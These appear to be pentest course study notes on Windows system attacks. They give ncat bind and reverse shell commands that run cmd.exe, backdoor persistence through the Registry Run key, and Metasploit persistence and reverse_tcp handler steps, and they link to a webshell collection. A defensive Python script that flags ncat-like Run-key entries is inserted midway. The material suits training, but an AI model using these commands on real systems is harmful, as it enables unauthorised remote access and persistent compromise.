⚙️System Attacks

Notes on system attacks from the ePTS course and other resources.


Last updated 3 years ago


Classification:

🚪Backdoor

Ncat

ncat [options] [hostname] [port]

Install it on the victim machine and run it with this command:

ncat -l -p 5555 -e cmd.exe

-l: listen; -e: execute the given file (here cmd.exe) so the connecting side can run commands.

The attacker then connects with:

ncat [victim_ip] 5555

Ncat can also be run the other way round, with the attacker listening and the target connecting back (a reverse shell); this is especially useful when the target is on another network:

On the attacker machine, listen:

ncat -l -p 5555 -v

-v: verbose, so we see connection output.

On the target machine:

ncat -e cmd.exe {attacker_ip} 5555

Persistent Backdoor:

In the Windows Registry Editor, under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`, add a string value for our ncat binary (or whatever it is named on the target machine) whose data is the command to run:

the path to ncat (renamed here to winconfig) followed by {Attacker_IP} {Port} -e cmd.exe

Then restart the victim machine.

As soon as a user logs in, the listening attacker gets a shell.
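A defender-side check for the Run-key persistence described above, added here as an example and not part of the original notes: it parses `reg query` output of the Run key and flags values whose command line looks like an ncat backdoor (a `-e` shell, a `-l -p` listener, or an IP-and-port connect-back). The sample output, the `winconfig` and `updater` names, paths, IP address and ports are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample of `reg query HKLM\...\Run` output; names, paths, IP and ports are made up.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    winconfig    REG_SZ    C:\Users\Public\winconfig.exe 10.0.0.5 5555 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    updater    REG_SZ    C:\ProgramData\nc.exe -l -p 4444 -e cmd.exe
"""

# One value line of `reg query` output: <name> <REG_type> <data>
VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
# ncat/nc-style execution redirection: -e or -c followed by a shell binary.
EXEC_SHELL = re.compile(
    r'(?:^|\s)-[ec]\s+(?:"?[^\s"]*\\)?(?:cmd|powershell|pwsh|sh|bash)(?:\.exe)?\b', re.I)
# Bind-shell style listener: -l together with -p <port>.
LISTENER = re.compile(r"(?:^|\s)-l\b.*(?:^|\s)-p\s+\d{1,5}\b", re.I)
# Connect-back target: an IPv4 address followed by a port number.
HOST_PORT = re.compile(r"(?:^|\s)\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}(?:\s|$)")

def parse_run_values(text: str) -> Dict[str, str]:
    """Map each Run-key value name to the command line stored in it."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group("name")] = m.group("data").strip()
    return values

def suspicious_run_entries(text: str) -> Dict[str, List[str]]:
    """Return {value_name: [reasons]} for entries that look like an ncat backdoor."""
    findings: Dict[str, List[str]] = {}
    for name, data in parse_run_values(text).items():
        reasons = []
        if EXEC_SHELL.search(data):
            reasons.append("spawns a shell via -e/-c")
        if LISTENER.search(data):
            reasons.append("opens a listening port")
        if HOST_PORT.search(data):
            reasons.append("connects back to host:port")
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    for name, reasons in suspicious_run_entries(SAMPLE_REG_QUERY).items():
        print(f"{name}: {', '.join(reasons)}")
```

On a live host, feed it the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` (and the HKCU and RunOnce keys) instead of the constructed sample.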

Metasploit

Using Meterpreter (like ncat above, but on steroids).

Getting persistence on the target machine:

After compromising a machine you already have a session, which you can list with the sessions command:

use exploit/windows/local/s4u_persistence

sessions //see all the sessions you have
set session <ID> //pick the session to make persistent

set trigger logon //whenever the target logs in you get a connection

set payload windows/meterpreter/reverse_tcp //whatever payload

//same as the attack you used to gain access in the first place and get this session
set lhost <your_IP>
set lport <open_Port>

Start the listener:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit

🔐Password Attacks

💦Buffer Overflow

Shell:

A shell is a program that executes commands. See "Execute a system command" on Rosetta Code for the various languages and ways to execute a system command (that is, to get a shell).

Open source webshells (read them before uploading them to a web server): GitHub - tennc/webshell, an open source webshell project.

Meterpreter: a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.